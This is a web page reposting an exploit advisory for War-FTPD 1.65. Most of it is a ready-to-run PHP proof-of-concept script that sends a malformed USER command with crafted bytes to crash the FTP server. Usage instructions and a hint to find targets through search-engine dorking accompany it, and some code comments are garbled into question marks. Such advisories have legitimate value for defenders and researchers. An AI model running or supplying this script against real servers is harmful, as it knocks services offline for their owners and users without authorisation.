Latest Tech

Latest Posts

War-FTPD 1.65 Denial of Service

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 308
War-FTPD 1.65 Denial of Service
War-FTPD 1.65 Denial of Service
=============================================================================================================================================
| # Title : War-FTPD 1.65 =============================================================================================================================================
| # Title : War-FTPD 1.65 Username - Denied of Service vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://tcls.tripod.com/warftpd.htm |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: War-FTPD version 1.65 remote denial of service exploit.

(Related : https://packetstorm.news/files/id/176926/ Linked CVE numbers: ) .

[+] save code as poc.php.

[+] Usage = C:\www>php 2.php 127.0.0.1 21

[+] PayLoad :

<?php
// War-FTPD 1.65 Username - Denied of Service (DoS) exploit

function intro() {
echo "\n-------------------------------------------------------------------------\n";
echo "--------------- [+] War-FTPD 1.65 Username - Denied of Service (DoS) ----\n";
echo "----------------------------indoushka------------------------------------\n";
}

function main_exploit($ip, $port) {
$exploit = "\x41\x41\x41\x41\x41\x41\x41\x41"; // Add more 'A's if needed
$exploit .= "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\r\n";

// ????? ??????? ???????
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
echo "Connection Failed: $errstr\n";
exit(1);
}

// ????? ???????? ??????? ?? ??????
$buffer = fread($sock, 1024);
echo "Connected => $buffer\n";

// ????? ??? "USER" ?? ???????
fwrite($sock, "USER ");
fwrite($sock, $exploit);

// ????? ?? ??????
$buffer = fread($sock, 1024);
echo "Authentication USER: $buffer\n";

fclose($sock);
}

// ?????? ?? ???????? ??? POST ?? GET
if ($argc != 3) {
echo "Usage: php script.php <ip> <port>\n";
exit(1);
}

intro();
main_exploit($argv[1], $argv[2]);
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.